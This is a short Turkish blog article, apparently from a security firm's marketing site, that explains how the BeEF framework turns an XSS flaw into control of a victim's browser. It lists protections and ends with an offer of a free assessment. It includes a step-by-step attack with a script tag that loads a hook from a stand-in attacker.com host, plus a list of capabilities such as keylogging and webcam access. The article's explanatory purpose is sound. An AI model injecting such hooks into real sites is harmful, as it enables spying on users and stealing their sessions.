BeEF (Browser Exploitation Framework) Nedir? XSS → Browser Kontrolü
BeEF — Browser Exploitation Framework. XSS bulgusuyla başlayan saldırı, kurbanın tarayıcısını tam kontrol altına almak.
BeEF Nasıl Çalışır?
1. Bir XSS bulgusu var (reflected veya stored)
2. Hacker, XSS yoluyla kurbanın tarayıcısına BeEF hook payload'ı enjekte eder
3. Kurban hook'u yükler → tarayıcı attacker'ın "beehive"'ine bağlanır
4. Attacker, kurbanın tarayıcısından istediğini yapabilir
Pratik Saldırı
Adım 1: BeEF sunucusu başlat
./beef
Server açılır (http://localhost:3000)
Adım 2: XSS payload'ı hazırla
<script src="http://attacker.com:3000/hook.js"></script>
Adım 3: Kurbanın tarayıcısına enjekte et
Paylaşım linki, forum yorum, vb. yoluyla
Sonuç: Kurbanın tarayıcısı BeEF "zombie"'si haline gelir. Attacker:
- Keylogger → tüm tuşlar kaydedilir
- Screenshot → ne yapıyor görebilir
- Webcam access → kamera aç
- Redirect → phishing sitesine yönlendir
- Session hijacking → başka sitelerde login olur
---
🔴 Risk Derecesi: Kritik
Kötü Niyetli Hacker Ne Yapabilirdi?
XSS → Browser Kontrol: İşletim sistemini bypass et, admin paneline gir
Credential Theft: Tarayıcıda kaydedilmiş şifreleri çal
Malware Dağıtma: Kurbanın tarayıcısından exploit'ler indir, işletim sistemine bulaştır
Fidye Yazılımı: Kurbanın dosyaları şifrele, para iste
---
✅ Koruma
1. Input Validation: XSS açıklarını kapatınız
2. CSP Headers: Sadece güvenilir script'ler çalışsın
3. Browser Güvenliği: Add-on'ları update tutun
4. 2FA: Şifre çalınsa bile hesap korumalı
---
Sonuç
BeEF, tek bir XSS açığından başlayıp kurbanın tüm dijital hayatını kontrol edebilir. XSS, küçük bir açık değil — sistem kontrolü demektir.
🛡️ Sisteminizin güvenliğinden emin misiniz?
Ücretsiz Ön Değerlendirme →Yazıdaki zafiyetlerden etkileniyor olabilirsiniz. REDCELL uzmanları 30 dakikada siber risk analizi yapar.